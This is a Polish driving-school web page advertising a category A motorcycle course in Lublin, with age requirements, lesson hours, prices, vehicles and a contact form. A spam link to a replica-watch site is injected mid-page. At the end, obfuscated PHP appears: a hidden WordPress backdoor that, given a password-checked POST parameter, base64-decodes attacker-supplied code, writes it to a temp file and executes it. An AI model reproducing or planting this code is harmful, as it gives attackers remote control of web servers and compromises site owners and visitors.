Jeśli szukasz solidnego kursu na kategorię A, to trafiłeś we właściwe miejsce!
Nasza szkoła nauki jazdy oferuje szkolenia dla przyszłych motocyklistów, którzy chcą zdobyć prawo jazdy na kategorię A.

Kurs na kategorię A można rozpocząć trzy miesiące przed ukończeniem 24. roku życia lub trzy miesiące przed ukończeniem 20. roku życia przy posiadaniu prawa jazdy kat. A2 nie krócej niż 2 lata

Wszystkie nasze kursy prowadzone są przez doświadczonych instruktorów, którzy indywidualnie dostosowują szkolenia do poziomu umiejętności i potrzeb każdego ucznia.

U nas otrzymasz kompleksowy kurs kategorii A, który obejmuje: 

  • 20 godzin zajęć praktycznych (+2 godziny gratis na egzamin wewnętrzny)
  • 30 godzin najciekawszych wykładów teoretycznych w Lublinie!


Dla osób, które chcą jeszcze bardziej podnieść swoje umiejętności, przedstawiamy cennik godzin dodatkowych:

  • 1h – 120 zł (100 zł – cena dla naszych kursantów)


Ukończony kurs oraz zdany egzamin państwowy na kategorię A, upoważnia Cię do kierowania:

  • Motocyklem lub pojazdem trójkołowym o mocy nieprzekraczającej 15 kW oraz wszystkimi pojazdami określonymi dla prawa jazdy kategorii AM, A1, A2.


Nasza oferta obejmuje kursy zarówno dla przyszłych, jak i doświadczonych motocyklistów.

Jeśli chcesz zdobyć prawo jazdy na kategorię A, skontaktuj się z nami już dziś! Dzięki naszym kursom nauczysz się wszystkiego, od podstawowej obsługi motocykla po zaawansowane techniki jazdy. Zapewniamy również niezbędne szkolenia z zakresu bezpieczeństwa, ucząc Cię, jak unikać typowych zagrożeń na drodze.

Nie czekaj! Zapisz się już dziś i rozpocznij z nami swoją motocyklową przygodę. Zostaw kontakt- oddzwonimy! 🙂


https://www.high-endrolex.com/7

Pojazdy w OSK

  • Yamaha Mt07(specjalnie obniżona dla niskich osób), którą podstawiamy naszym kursantom na Egzamin Państwowy w WORD
  • Suzuki SV

arrow-left

Zostaw swój numer telefonu


Ucz się pod okiem profesjonalistów i pasjonatów prawdziwej motoryzacji Gwarantujemy najlepsze przygotowanie do egzaminów w przyjaznych warunkach i fajnej atmosferze!

    Oświadczam, że moje dane osobowe podaję dobrowolnie i zgadzam się na przetwarzanie moich danych osobowych podanych w formularzu, przez OSK AUTOHOLIK w celu odpowiedzi na wiadomość.

    if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}